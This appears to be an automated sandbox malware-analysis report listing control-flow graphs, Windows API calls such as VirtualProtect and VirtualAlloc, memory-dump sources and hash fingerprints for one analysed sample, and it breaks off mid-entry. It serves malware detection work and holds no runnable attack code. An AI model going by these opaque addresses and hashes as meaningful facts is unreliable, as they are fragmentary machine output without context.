                                                              control_flow_graph 518 5e3f50-5e3f5d 519 5e3f5f 518->519 520 5e3f70-5e3f77 518->520 521 5e3f67-5e3f6b 519->521 522 5e3f61-5e3f65 519->522 523 5e3f79-5e3f8d call 5e4940 520->523 524 5e3f92-5e3fb3 call 5e60d0 520->524 525 5e40a7-5e40aa 521->525 522->520 522->521 523->525 530 5e3fb5-5e3ffc call 5e40b0 call 5e6230 call 5e6ca0 call 5e61b0 524->530 531 5e4001-5e4008 524->531 530->531 533 5e400e-5e4016 call 5e5bf0 531->533 534 5e4098-5e40a5 531->534 540 5e401d-5e4024 533->540 534->525 542 5e4026-5e4038 call 5f0d80 540->542 543 5e4071-5e4075 540->543 547 5e403d-5e405c 542->547 543->534 544 5e4077-5e4088 call 5f0d80 543->544 552 5e408d-5e4095 544->552 550 5e405e-5e406d 547->550 551 5e406f 547->551 550->525 551->540 552->534
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: __fread_nolock$Min_value
                                                              • String ID:
                                                              • API String ID: 3100174245-0
                                                              • Opcode ID: 8371f13d69e443bdbdbb54f4938de538dee45e7015f964985af737612c5b5777
                                                              • Instruction ID: a7c677dfde5a4c37052497a2b2d5074d090725538c3441d340a5c4e11223a9df
                                                              • Opcode Fuzzy Hash: 8371f13d69e443bdbdbb54f4938de538dee45e7015f964985af737612c5b5777
                                                              • Instruction Fuzzy Hash: 7251FA75E00149EFCB08DF99C888AAEBBB1BF88304F108569E555AB341D735AE45DF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 553 5f9fe9-5f9ff6 554 5f9ff8-5fa01b call 5f13c0 553->554 555 5fa020-5fa034 call 5f5e72 553->555 560 5fa187-5fa189 554->560 561 5fa039-5fa042 call 5fb156 555->561 562 5fa036 555->562 564 5fa047-5fa056 561->564 562->561 565 5fa058 564->565 566 5fa066-5fa06f 564->566 567 5fa05e-5fa060 565->567 568 5fa130-5fa135 565->568 569 5fa083-5fa0b7 566->569 570 5fa071-5fa07e 566->570 567->566 567->568 571 5fa185-5fa186 568->571 573 5fa0b9-5fa0c3 569->573 574 5fa114-5fa120 569->574 572 5fa183 570->572 571->560 572->571 577 5fa0ea-5fa0f6 573->577 578 5fa0c5-5fa0d1 573->578 575 5fa137-5fa13a 574->575 576 5fa122-5fa129 574->576 580 5fa13d-5fa145 575->580 576->568 577->575 579 5fa0f8-5fa112 call 5fa500 577->579 578->577 581 5fa0d3-5fa0e5 call 5fa355 578->581 579->580 584 5fa147-5fa14d 580->584 585 5fa181 580->585 581->571 588 5fa14f-5fa163 call 5fa18a 584->588 589 5fa165-5fa169 584->589 585->572 588->571 590 5fa17c-5fa17e 589->590 591 5fa16b-5fa179 call 607e10 589->591 590->585 591->590
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: =^
                                                              • API String ID: 0-34250961
                                                              • Opcode ID: e6334f29c034c610681e9646df5c21512a5e39889c8c332a0189f8a5d171783f
                                                              • Instruction ID: 6580cc028181d82c436ae2cdd4e02ef7df90a7c90f85731a1287fc34c978ef7f
                                                              • Opcode Fuzzy Hash: e6334f29c034c610681e9646df5c21512a5e39889c8c332a0189f8a5d171783f
                                                              • Instruction Fuzzy Hash: D25193B0A00208AFDB14CF58CC85EBA7FB5FB89364F298558E9095B252D3759E41CB92

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 596 5e2b40-5e2b9e call 5e5390 call 5e4f80 call 5e4f40 603 5e2ba9-5e2bad 596->603 604 5e2baf-5e2bc7 call 5e4f00 603->604 605 5e2bc9-5e2bf3 call 5e5080 call 5e5190 603->605 604->603 613 5e2bfe-5e2c04 605->613 614 5e2c06-5e2c1e call 5e4f00 613->614 615 5e2c67-5e2ca8 call 5e5230 call 5e4f20 call 5e5210 613->615 621 5e2c22-5e2c43 call 5e4f00 614->621 622 5e2c20 614->622 628 5e2c65 621->628 629 5e2c45-5e2c57 call 5e50a0 621->629 622->615 628->613 632 5e2c5c-5e2c62 629->632 632->628
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: task
                                                              • String ID: @
                                                              • API String ID: 1384045349-2766056989
                                                              • Opcode ID: 00f9e9671148ac63dde79941a7c1af2288c368fb78e8eea4485058baf08f0801
                                                              • Instruction ID: 87d8c2072a839f10ea064c82adf24af6fd06ba93605bd04f5062f7946175a9cd
                                                              • Opcode Fuzzy Hash: 00f9e9671148ac63dde79941a7c1af2288c368fb78e8eea4485058baf08f0801
                                                              • Instruction Fuzzy Hash: B8411B71C0058ADFCB08DF95D955AEEBBB4FF48714F208259E4A27B395DB346A04CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 633 5e7d00-5e7d3f call 5e1540 636 5e7d8f-5e7da4 call 5e1520 633->636 637 5e7d41-5e7d48 call 5e8560 633->637 641 5e7d4d-5e7d8a call 5e8590 call 5e83d0 637->641 641->636
                                                              APIs
                                                              • Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 005E7D8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::cancellation_token_source::~cancellation_token_source
                                                              • String ID: Z6^
                                                              • API String ID: 2028376226-2611322866
                                                              • Opcode ID: 7b0863fe271b2676b55226f38b59cbe4313528dc3f18fbfb97a9f1e582d96fcc
                                                              • Instruction ID: b8c34191347051b9548fdf5717bc69265f8fa4db25007b95bc9ec9b135a156b4
                                                              • Opcode Fuzzy Hash: 7b0863fe271b2676b55226f38b59cbe4313528dc3f18fbfb97a9f1e582d96fcc
                                                              • Instruction Fuzzy Hash: 92110AB1D0024AEFCB08DF98C995BEEBBB5FB48710F108259E559A7380DB345A41CFA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 645 5f7315-5f7337 646 5f733d-5f733f 645->646 647 5f752a 645->647 649 5f736b-5f738e 646->649 650 5f7341-5f7360 call 5f13c0 646->650 648 5f752c-5f7530 647->648 651 5f7394-5f739a 649->651 652 5f7390-5f7392 649->652 656 5f7363-5f7366 650->656 651->650 655 5f739c-5f73ad 651->655 652->651 652->655 657 5f73af-5f73bd call 5fb1b4 655->657 658 5f73c0-5f73d0 call 5f6e5a 655->658 656->648 657->658 663 5f7419-5f742b 658->663 664 5f73d2-5f73d8 658->664 665 5f742d-5f7433 663->665 666 5f7482-5f74a2 WriteFile 663->666 667 5f73da-5f73dd 664->667 668 5f7401-5f7417 call 5f6a2b 664->668 672 5f746e-5f747b call 5f6ed7 665->672 673 5f7435-5f7438 665->673 669 5f74ad 666->669 670 5f74a4-5f74aa GetLastError 666->670 674 5f73df-5f73e2 667->674 675 5f73e8-5f73f7 call 5f6df2 667->675 685 5f73fa-5f73fc 668->685 679 5f74b0-5f74bb 669->679 670->669 684 5f7480 672->684 680 5f745a-5f746c call 5f709b 673->680 681 5f743a-5f743d 673->681 674->675 682 5f74c2-5f74c5 674->682 675->685 686 5f74bd-5f74c0 679->686 687 5f7525-5f7528 679->687 691 5f7455-5f7458 680->691 688 5f74c8-5f74ca 681->688 689 5f7443-5f7450 call 5f6fb2 681->689 682->688 684->691 685->679 686->682 687->648 692 5f74cc-5f74d1 688->692 693 5f74f8-5f7504 688->693 689->691 691->685 698 5f74ea-5f74f3 call 5f1fd1 692->698 699 5f74d3-5f74e5 692->699 696 5f750e-5f7520 693->696 697 5f7506-5f750c 693->697 696->656 697->647 697->696 698->656 699->656
                                                              APIs
                                                                • Part of subcall function 005F6A2B: GetConsoleOutputCP.KERNEL32(9EDA4073,00000000,00000000,?), ref: 005F6A8E
                                                              • WriteFile.KERNEL32(?,00000000,005F112F,?,00000000,00000000,00000000,?,00000000,?,005E97B5,005F112F,00000000,005E97B5,?,?), ref: 005F749A
                                                              • GetLastError.KERNEL32(?,005F112F,00000000,?,005E97B5,?,00000000,00000000), ref: 005F74A4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                              • String ID:
                                                              • API String ID: 2915228174-0
                                                              • Opcode ID: 285e2fa210f2a6aa5567f781cc5da2455ca02d6652a44a19b04f6b16d86f0948
                                                              • Instruction ID: 1247c3e259e552eb05b57b607e78978bfc40d57f56e019ecdff5af7d341cf21e
                                                              • Opcode Fuzzy Hash: 285e2fa210f2a6aa5567f781cc5da2455ca02d6652a44a19b04f6b16d86f0948
                                                              • Instruction Fuzzy Hash: 6B618E7190811EABDF11DFA8C888EFEBFBABF49304F144549EA04A7252D379D911DB60

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 005E73B0: _Max_value.LIBCPMTD ref: 005E73DC
                                                                • Part of subcall function 005E73B0: _Min_value.LIBCPMTD ref: 005E7402
                                                              • allocator.LIBCONCRTD ref: 005E7FC3
                                                              • allocator.LIBCONCRTD ref: 005E8032
                                                                • Part of subcall function 005E1550: std::_Xinvalid_argument.LIBCPMT ref: 005E1558
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: allocator$Max_valueMin_valueXinvalid_argumentstd::_
                                                              • String ID:
                                                              • API String ID: 3868691235-0
                                                              • Opcode ID: 0138b62f7dce15abdcc9b456c468e231641729e8c990895106847cfbb7c0d36a
                                                              • Instruction ID: cf68f9ae4589754578288b0725a65401ed9b5dedc3a14a2ade2f6f19eb67af4b
                                                              • Opcode Fuzzy Hash: 0138b62f7dce15abdcc9b456c468e231641729e8c990895106847cfbb7c0d36a
                                                              • Instruction Fuzzy Hash: E441C5B5D00149EFCF08DF99D9919AEBBB5BF8C300F208599E559A7341DB30AE41CBA0
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,005F7480,00000000,?,00000000,005F112F,00000000,00000000), ref: 005F6F73
                                                              • GetLastError.KERNEL32(?,005F7480,00000000,?,00000000,005F112F,00000000,00000000,?,00000000,?,005E97B5,005F112F,00000000,005E97B5,?), ref: 005F6F99
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              • Opcode ID: 0f69a69eb061426743d6f3277cced0efd153d689ac9e6c8108dfff11eb40f40f
                                                              • Instruction ID: 34805d4b508eade8eaf6c564f7cf26ad0adaaa351efdd3000e8884f864bcd0ef
                                                              • Opcode Fuzzy Hash: 0f69a69eb061426743d6f3277cced0efd153d689ac9e6c8108dfff11eb40f40f
                                                              • Instruction Fuzzy Hash: 77217435A0021D9FCF15CF29DD809E9BBBAFB8C305F1444AAEA46D7216D630DD42CB65
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 005F681C
                                                              • GetFileType.KERNEL32(00000000), ref: 005F682E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: FileHandleType
                                                              • String ID:
                                                              • API String ID: 3000768030-0
                                                              • Opcode ID: 500df71c76b8d187aae44cc7ea53c4196946a85e11635cb58d78d30da737612b
                                                              • Instruction ID: 489b522f611310bb21f4819cf2099dcb72c78ef94cc84aefe71308577f8337c6
                                                              • Opcode Fuzzy Hash: 500df71c76b8d187aae44cc7ea53c4196946a85e11635cb58d78d30da737612b
                                                              • Instruction Fuzzy Hash: 8E11D3716047554ACB304E3E8C98632BEE5B7563B4B380B1ED2B6975F2C338D886D691
                                                              APIs
                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00616918,005E97B5,00000002,005E97B5,00000000,?,?,?,005FB19D,00000000,?,005E97B5,00000002,00616918), ref: 005FB0CF
                                                              • GetLastError.KERNEL32(005E97B5,?,?,?,005FB19D,00000000,?,005E97B5,00000002,00616918,00000000,005E97B5,00000000,00616918,0000000C,005F1206), ref: 005FB0DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: ef656fcec37267ad8b6bbf7e6e80a945a593875900556181c7e30ca36807d36d
                                                              • Instruction ID: 0da2953fe4dacd9a186b9e8e2ac5755ac41b20e8c1979c35c04a5198cd450169
                                                              • Opcode Fuzzy Hash: ef656fcec37267ad8b6bbf7e6e80a945a593875900556181c7e30ca36807d36d
                                                              • Instruction Fuzzy Hash: FB010032604619EFDB058F59DC49DAF3F2AFB84320B244248F9119B291EB72ED41CBA0
                                                              APIs
                                                                • Part of subcall function 036C98D2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 036C9964
                                                              • VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 036C77E7
                                                              • VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 036C780A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProtectVirtual$LibraryLoad
                                                              • String ID:
                                                              • API String ID: 895956442-0
                                                              • Opcode ID: f8598576150d5a0620274e77ba00d3ce24ec92924df4b670bdb29c09dfee1e24
                                                              • Instruction ID: 85337127eff14e1afa8f3625a5dec311abf3192935144c62d91939cef2233eb3
                                                              • Opcode Fuzzy Hash: f8598576150d5a0620274e77ba00d3ce24ec92924df4b670bdb29c09dfee1e24
                                                              • Instruction Fuzzy Hash: EEF06DB62106447EE710E664CC41FFB72ECEF45B50F44482CFB16D6180EB61EA01DBA5
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7547
                                                              • GetLastError.KERNEL32(005EDE01,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7552
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 485612231-0
                                                              • Opcode ID: f02c50e31f7d52994244594c7e445afdbd560a739b9944ffec8b9eddd30ad3ef
                                                              • Instruction ID: a85ddb6338f380f9278cd0ced2269d07e8acf98ebd965c557d36e7767102e815
                                                              • Opcode Fuzzy Hash: f02c50e31f7d52994244594c7e445afdbd560a739b9944ffec8b9eddd30ad3ef
                                                              • Instruction Fuzzy Hash: 79E08C3260461DABDB116BA4FC0DBAA3E6AAB44B51F204029F708861A1DB388940C7A9
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 036C859E
                                                              • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 036C88E2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID:
                                                              • API String ID: 2087232378-0
                                                              • Opcode ID: 2923ffbbd088fcb14a2ba6a0f44f74b26ffba7a218e7267c1327e4f48e88d229
                                                              • Instruction ID: dcea80f10a5a5e2e4a1ac7342ba5bca62253a89b1d5740110903828d65a608aa
                                                              • Opcode Fuzzy Hash: 2923ffbbd088fcb14a2ba6a0f44f74b26ffba7a218e7267c1327e4f48e88d229
                                                              • Instruction Fuzzy Hash: 85B1E131621B86ABDB31EA60CD80BBBF7E8FF05310F18092DE55997650E731E560CBA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tMl$tMl
                                                              • API String ID: 0-3200977928
                                                              • Opcode ID: b752965e72ac800e0ca3bcfc9dd4261b4b5994ed984cb1b2912d5b6437c37ec6
                                                              • Instruction ID: d8be823d8feb4202bfe599ea4719a7aa3ea29c17cf477cad547fdd06dc574fad
                                                              • Opcode Fuzzy Hash: b752965e72ac800e0ca3bcfc9dd4261b4b5994ed984cb1b2912d5b6437c37ec6
                                                              • Instruction Fuzzy Hash: 4C51BD75B043598FCB15DBB988546BEBFF6FF89200B0844A9D446DB391DB38D901CBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8Vl$LR]q
                                                              • API String ID: 0-1558500584
                                                              • Opcode ID: 4e0af83d93f490cf963593ecf87fa4074d287e7e5a38e8934e96576327f3042c
                                                              • Instruction ID: 2f487b070ed19e6b7b0f2456eb7e7e344858890a3e9183cf868f4d20ff96c35c
                                                              • Opcode Fuzzy Hash: 4e0af83d93f490cf963593ecf87fa4074d287e7e5a38e8934e96576327f3042c
                                                              • Instruction Fuzzy Hash: 5B418A75B142089FDB18DF39D858A6DBBB2FF88700F148569E406EB3A0DB30AC01CB95
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8Vl$LR]q
                                                              • API String ID: 0-1558500584
                                                              • Opcode ID: a7e0698f90373463f3d21c3ce089d01f748948965984e58b7b458add12820aad
                                                              • Instruction ID: d689938bed887fb0324d856df74626268004f8e9ba5bca9550bff3f24ed96e47
                                                              • Opcode Fuzzy Hash: a7e0698f90373463f3d21c3ce089d01f748948965984e58b7b458add12820aad
                                                              • Instruction Fuzzy Hash: 32412B75B142089FDB18DF69D858A6E7BB2FF88710F118469E406EB3A0DB74EC01CB95
                                                              APIs
                                                                • Part of subcall function 005E6430: std::ios_base::clear.LIBCPMTD ref: 005E6461
                                                              • fpos.LIBCPMTD ref: 005E399A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: fposstd::ios_base::clear
                                                              • String ID:
                                                              • API String ID: 1508181384-0
                                                              • Opcode ID: e1efdcaf502ad074db20d0c6b07f3c64875bfb445f1b256337aefa476a8e9f45
                                                              • Instruction ID: 63839f0dfd22bb168c4eada481a6acdca87461c5c8cf88766cbed1c8ecbe0b33
                                                              • Opcode Fuzzy Hash: e1efdcaf502ad074db20d0c6b07f3c64875bfb445f1b256337aefa476a8e9f45
                                                              • Instruction Fuzzy Hash: E5313DB5A0061A9FCB08DF95C891BAEB7B5FF88714F108618E525AB3D1DB31A901CB90
                                                              APIs
                                                                • Part of subcall function 005E5750: std::ios_base::good.LIBCPMTD ref: 005E578C
                                                              • char_traits.LIBCPMTD ref: 005E86CB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: char_traitsstd::ios_base::good
                                                              • String ID:
                                                              • API String ID: 160274934-0
                                                              • Opcode ID: 059bae58ca83c72737ee6a6e78ec2e017dd66e68e09294272231ffe88c6eb758
                                                              • Instruction ID: 2a4aab5b2ddf720138deee0d50c2d6ff8977e5f012cc9a5bc52b791a2e685797
                                                              • Opcode Fuzzy Hash: 059bae58ca83c72737ee6a6e78ec2e017dd66e68e09294272231ffe88c6eb758
                                                              • Instruction Fuzzy Hash: 7D312BB4D0024A9FCF08DF95C991AFEBBB5FF48314F208119E545BB281DB35AA00CBA0
                                                              APIs
                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 005E4C8A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                              • String ID:
                                                              • API String ID: 3936482309-0
                                                              • Opcode ID: 0e974cc9f43296fd16084f26bfb80b12497d577ee30dbb94e77df252dbc1c587
                                                              • Instruction ID: 9192f7040db79c4b7530acb0237282936ddebf65fc3c80bbdba80c31cb20ae23
